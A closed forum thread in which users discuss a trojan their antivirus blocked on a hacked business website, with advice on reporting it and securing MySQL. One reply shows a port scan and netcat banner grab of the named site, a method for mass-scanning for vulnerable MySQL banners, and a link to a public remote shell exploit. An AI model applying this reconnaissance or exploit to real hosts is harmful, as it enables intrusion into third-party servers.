We'd like to remind Forumites to please avoid political debate on the Forum... Read More »
📨 Have you signed up to the Forum's new Email Digest yet? Get a selection of trending threads sent straight to your inbox daily, weekly or monthly!
Trojan Blocked
Options
Comments
-
You should be ok. The webshield caught it before it was executed.Thanks scott, ive run a malwarebytes scan which reports nothing. Any idea how or why this infection is lodged on this site?
Usually it is done by making use of a vulnerability in the website's management system, stealing FTP passwords...etc...
Then they inject the code.
Exactly...since so many "safe" sites are hacked these days, you can't be safe by no going to "shady" sites.Sure makes an argument against the strength of "common sense" in protecting against viruses, seeing how few detect obfuscated code...
And for when the AV doesn't detect it, something like NoScript can help (will block the script/iframes - until you explicitly run it, but that isn't something you would be blase about) but for users who are not used to it, it can be rather tiresome...which I understand.
asbokid,
Nice, thanks but can you please remove it otherwise there will be alerts on this page and sessionstore.js (firefox anyway, equivalent for others)
That is why I post images, as they show the script but don't cause alerts. I know you deactivated the link, but it could still generate an alert.-Scott-
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman0 -
As avast prevents me from getting to the website is the infection in an image on the website?0
-
No it is an iframe, that basically loads the (external) page that asbokid posted. Which then serves some exploit/loads some other code or whatever...-Scott-
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman0 -
If I ring them tomorrow how should I explain it?0
-
I just scanned ww--w.cu--rat--ech.net (83.170.64.77)
Interesting ports on superultra7.uk2.net (83.170.64.77): [B]PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp? |_ ftp-bounce: no banner 80/tcp open http? |_ html-title: Welcome to the curatech.net homepage 3306/tcp open mysql?[/B]
It's pretty, erm, brave to leave a mysql daemon open to world and his dog. That's probably how the hacker gained entry. Once he was in, he then installed himself an ftp server, so he could upload his malware!$ nc www.curatech.net 3306 + 4.0.24-log�=MKmg>;O, ^C $
Now what's the bet that somewhere on net there's a ready-rolled script to exploit a vulnerability in mysql version 4.0.24..
Once the hacker had exploited the mysql vulnerability and elevated his privileges, he could access the /var/www directory on the server. That's the directory tree where all the pages hosted by an apache webserver are normally found. The hacker then ran another script that appended his obfuscated malware code to every web page in that directory tree.
The hacker is probably comprising hundreds of websites every hour.
He just port scans tcp/3306 on whole netblocks, looking for responses containing the "4.0.24-log" banner.. That identifies the site as vulnerable, and he then targets it.0 -
I'm amazed at the knowledge of you guys!!!0
-
asbokid...link is active
-Scott-
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman0 -
Did all of you contributors do computer science degrees?0
-
mysqld 4.0.24 has been known to be vulnerable since 2006. There are dozens of documented vulnerabilities in 4.0.24 and earlier.Now what's the bet that there's a ready-rolled script to exploit a vulnerability in mysql version 4.0.24..
There's really no reason to be running such an ancient version of mysqld today, and no excuse for leaving it open to the world. The mysql daemon should be up-to-date and safely tucked behind a firewall, or in a VPN, or listening for connections from localhost or local clients only.
EDIT: This looks like the best exploit for mysqld 4.x.x. The hacker perhaps used it. -- The remote exploit binds a shell to a network port. It would allow the hacker to log in that estate agent's website and do anything that the owner of the mysqld database process is able to do...MySQL COM_TABLE_DUMP Information Leakage and Arbitrary command execution.Author: Stefano Di Paola
Vulnerable: MySQL <= 4.0.26, 4.1.18,5.0.20
MySQL Server has an information leakage flaw if a malicious client sends a specific forged packet. Moreover some particular input can crash the server by overwriting the stack which could lead to remote server compromise.
http://www.wisec.it/vulns.php?page=8
http://www.wisec.it/Download/vulns/my_com_table_dump_exploit.c0 -
Tell them that your AV has alerted you to the fact that the site has been hacked, and then direct them here. The important information is here.If I ring them tomorrow how should I explain it?-Scott-
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman0
This discussion has been closed.
Confirm your email address to Create Threads and Reply
Categories
- All Categories
- 351.1K Banking & Borrowing
- 253.2K Reduce Debt & Boost Income
- 453.6K Spending & Discounts
- 244.1K Work, Benefits & Business
- 599.1K Mortgages, Homes & Bills
- 177K Life & Family
- 257.4K Travel & Transport
- 1.5M Hobbies & Leisure
- 16.1K Discuss & Feedback
- 37.6K Read-Only Boards